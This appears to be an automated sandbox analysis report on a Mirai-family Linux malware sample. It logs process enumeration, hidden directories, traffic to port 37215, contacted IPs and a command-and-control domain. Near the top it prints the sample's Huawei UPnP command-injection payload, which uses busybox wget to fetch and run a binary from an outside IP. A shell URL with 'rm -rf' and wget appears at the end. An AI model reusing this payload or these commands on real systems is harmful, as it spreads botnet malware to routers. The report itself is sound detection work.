Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: classification engine Classification label: mal96.spre.troj.lin@0/1@60/0
Enumerates processes within the "proc" file system
Source: /tmp/file1 (PID: 5231) File opened: /proc/5140/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/5143/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1582/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2033/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2275/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/3088/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1612/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1579/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1699/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1335/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1698/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2028/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1334/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1576/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2302/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/3236/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2025/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2146/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/910/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/912/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/517/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/759/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2307/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/918/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/4460/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/4461/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1594/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2285/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2281/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1349/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1623/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/761/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1622/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/884/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1983/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2038/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1344/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1465/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1586/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1860/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1463/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2156/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/800/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/801/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/5029/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1629/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/4458/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/4459/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1627/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1900/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/3021/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/491/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2294/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2050/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1877/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/772/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1633/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1599/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1632/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/774/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1477/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/654/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/896/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1476/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1872/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2048/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/655/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1475/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2289/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/656/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/777/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/657/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/658/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/419/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/936/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1639/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1638/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2208/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2180/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/5174/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/4482/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/5175/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1809/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1494/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1890/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2063/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2062/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1888/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1886/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/420/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1489/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/785/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1642/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/788/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/667/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/789/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1648/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2078/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2077/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2074/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2195/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/670/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/2746/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/793/cmdline Jump to behavior
Source: /tmp/file1 (PID: 5231) File opened: /proc/1656/cmdline Jump to behavior
Creates hidden files and/or directories
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5238) Directory: /home/saturnino/.cache Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5238) Directory: /home/saturnino/.local Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5238) Directory: /home/saturnino/.config Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5250) Directory: /home/saturnino/.cache Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5250) Directory: /home/saturnino/.local Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5250) Directory: /home/saturnino/.config Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5250) Directory: /home/saturnino/.config Jump to behavior
Executes the "rm" command used to delete files or directories
Source: /usr/bin/dash (PID: 5217) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.bhkKqn6VLL /tmp/tmp.RuRqJkNDuA /tmp/tmp.FX40reyTu0 Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 41612 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 41612 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 41612 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37924 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53452 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 52114 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53452 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 41612 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37924 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53452 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53452 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 41612 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37924 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53452 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37924 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 41612 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53452 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 44352 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37924 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 41612 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37090 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53452 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 55556 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 55556 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 55556 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 55556 -> 37215
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5237) Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5238) Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5239) Queries kernel information via 'uname': Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: file1, type: SAMPLE
Source: Yara match File source: 5225.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5227.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: file1, type: SAMPLE
Source: Yara match File source: 5225.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5227.1.000000001a887bdc.00000000328ec990.r-x.sdmp, type: MEMORY
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
151.226.166.50
 unknown United Kingdom
5607 BSKYB-BROADBAND-ASGB false
14.228.128.141
 unknown Viet Nam
45899 VNPT-AS-VNVNPTCorpVN false
197.59.229.32
 unknown Egypt
8452 TE-ASTE-ASEG false
41.35.35.134
 unknown Egypt
8452 TE-ASTE-ASEG false
210.165.251.143
 unknown Japan 2514 INFOSPHERENTTPCCommunicationsIncJP false
134.120.216.174
 unknown United States
10455 LUCENT-CIOUS false
168.222.253.185
 unknown United States
2386 INS-ASUS false
156.92.15.66
 unknown United States
10695 WAL-MARTUS false
197.136.25.2
 unknown Kenya
36914 KENET-ASKE false
41.99.68.177
 unknown Algeria
36947 ALGTEL-ASDZ false
74.64.23.25
 unknown United States
12271 TWC-12271-NYCUS false
86.240.156.164
 unknown France
3215 FranceTelecom-OrangeFR false
41.94.163.82
 unknown Mozambique
327700 MoRENetMZ false
41.106.43.128
 unknown Algeria
36947 ALGTEL-ASDZ false
205.175.95.64
 unknown United States
14630 INVESCOUS false
197.217.236.118
 unknown Angola
11259 ANGOLATELECOMAO false
161.164.218.240
 unknown United States
10695 WAL-MARTUS false
130.205.38.203
 unknown United States
13124 IBGCBG false
178.218.134.59
 unknown Romania
50835 IFUTURERO false
208.67.236.151
 unknown United States
40009 BITGRAVITYUS false
160.100.160.201
 unknown United Kingdom
715 WOODYNET-2US false
156.254.119.6
 unknown Seychelles
63981 NTDKL-HK43FAIATower183ElectricRoadNorthPointHo false
73.152.94.189
 unknown United States
7922 COMCAST-7922US false
162.115.86.71
 unknown United States
12079 CELLCO-PARTUS false
175.108.35.207
 unknown Japan 2516 KDDIKDDICORPORATIONJP false
217.22.110.121
 unknown Spain
15711 IBERDROLABilbaoES false
41.68.48.244
 unknown Egypt
24835 RAYA-ASEG false
24.33.86.89
 unknown United States
10796 TWC-10796-MIDWESTUS false
161.46.177.71
 unknown United States
1252 UNMC-ASUS false
60.19.228.233
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
170.218.220.32
 unknown United States
11740 PROGRESSIVE-ASUS false
197.191.38.219
 unknown Ghana
37140 zain-asGH false
133.0.206.81
 unknown Japan 385 AFCONC-BLOCK1-ASUS false
41.145.207.246
 unknown South Africa
5713 SAIX-NETZA false
188.173.82.208
 unknown Romania
48161 NG-ASSosBucuresti-Ploiestinr42-44RO false
197.214.155.167
 unknown Congo
37550 airtelcgCG false
197.73.132.136
 unknown South Africa
16637 MTNNS-ASZA false
205.245.72.43
 unknown United States
30385 PERDUE-FARMS-INCORPORATEDUS false
197.143.201.73
 unknown Algeria
36891 ICOSNET-ASDZ false
27.21.41.20
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
19.112.97.205
 unknown United States
3 MIT-GATEWAYSUS false
87.222.194.121
 unknown Spain
12479 UNI2-ASES false
217.156.198.183
 unknown United Kingdom
3549 LVLT-3549US false
206.114.194.64
 unknown United States
3561 CENTURYLINK-LEGACY-SAVVISUS false
190.74.207.8
 unknown Venezuela
8048 CANTVServiciosVenezuelaVE false
179.101.227.73
 unknown Brazil
27699 TELEFONICABRASILSABR false
34.0.71.110
 unknown United States
2686 ATGS-MMD-ASUS false
45.141.18.24
 unknown Netherlands
34562 PROIP-ASIncaseofproblemscontactnocproipnetNL false
156.241.11.81
 unknown Seychelles
135357 SKHT-ASShenzhenKatherineHengTechnologyInformationCo false
162.237.115.197
 unknown United States
7018 ATT-INTERNET4US false
197.234.167.159
 unknown South Africa
37315 CipherWaveZA false
168.11.235.136
 unknown United States
3480 PEACHNET-AS2US false
60.53.67.215
 unknown Malaysia
4788 TMNET-AS-APTMNetInternetServiceProviderMY false
47.228.85.29
 unknown United States
7224 AMAZON-ASUS false
66.81.23.243
 unknown United States
14265 US-TELEPACIFICUS false
41.77.181.142
 unknown Algeria
36974 AFNET-ASCI false
133.9.169.38
 unknown Japan 17956 WASEDAWASEDAUniversityJP false
73.105.58.29
 unknown United States
7922 COMCAST-7922US false
152.116.148.10
 unknown United States
2018 TENET-1ZA false
147.48.77.176
 unknown United States
5180 DNIC-ASBLK-05120-05376US false
195.164.130.163
 unknown Poland
204679 OSEPL false
27.236.188.140
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
41.25.211.135
 unknown South Africa
36994 Vodacom-VBZA false
109.145.152.71
 unknown United Kingdom
2856 BT-UK-ASBTnetUKRegionalnetworkGB false
107.128.43.13
 unknown United States
7018 ATT-INTERNET4US false
191.92.238.169
 unknown Colombia
27831 ColombiaMovilCO false
8.129.155.155
 unknown Singapore
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd false
204.85.103.204
 unknown United States
81 NCRENUS false
199.130.247.154
 unknown United States
4152 USDA-1US false
156.192.115.130
 unknown Egypt
8452 TE-ASTE-ASEG false
76.12.107.141
 unknown United States
20021 LNH-INCUS false
49.100.27.192
 unknown Japan 9605 DOCOMONTTDOCOMOINCJP false
152.83.207.143
 unknown Australia
6262 CSIROCommonwealthScientificandIndustrialAU false
153.246.205.122
 unknown Japan 4713 OCNNTTCommunicationsCorporationJP false
85.211.188.113
 unknown United Kingdom
9105 TISCALI-UKTalkTalkCommunicationsLimitedGB false
160.120.31.172
 unknown Cote D'ivoire
29571 ORANGE-COTE-IVOIRECI false
95.23.230.97
 unknown Spain
12479 UNI2-ASES false
142.193.218.70
 unknown Canada
13576 SDNW-13576US false
41.138.141.89
 unknown Mauritania
37541 CHINGUITELMR false
41.35.57.70
 unknown Egypt
8452 TE-ASTE-ASEG false
13.65.160.209
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
146.211.32.105
 unknown Finland
16086 DNAFI false
197.12.31.210
 unknown Tunisia
37703 ATLAXTN false
197.231.80.95
 unknown Gabon
37582 ANINFGA false
105.1.204.215
 unknown South Africa
37168 CELL-CZA false
156.16.3.222
 unknown unknown
29975 VODACOM-ZA false
47.152.237.217
 unknown United States
5650 FRONTIER-FRTRUS false
197.104.77.51
 unknown South Africa
37168 CELL-CZA false
8.159.102.86
 unknown Singapore
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd false
197.217.236.147
 unknown Angola
11259 ANGOLATELECOMAO false
197.207.206.191
 unknown Algeria
36947 ALGTEL-ASDZ false
156.3.205.253
 unknown United States
2920 LACOEUS false
39.123.64.75
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR false
197.235.33.63
 unknown Mozambique
37223 VODACOM-MZ false
62.186.69.39
 unknown European Union
34456 RIALCOM-ASRU false
197.251.50.178
 unknown Sudan
37197 SUDRENSD false
41.69.166.172
 unknown Egypt
24835 RAYA-ASEG false
169.108.126.83
 unknown United States
37611 AfrihostZA false
82.51.56.243
 unknown Italy
3269 ASN-IBSNAZIT false
54.50.233.185
 unknown United States
14618 AMAZON-AESUS false

Contacted Domains

Name IP Active
cnc.luxstresser.xyz unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+ true
  • Avira URL Cloud: safe
 unknown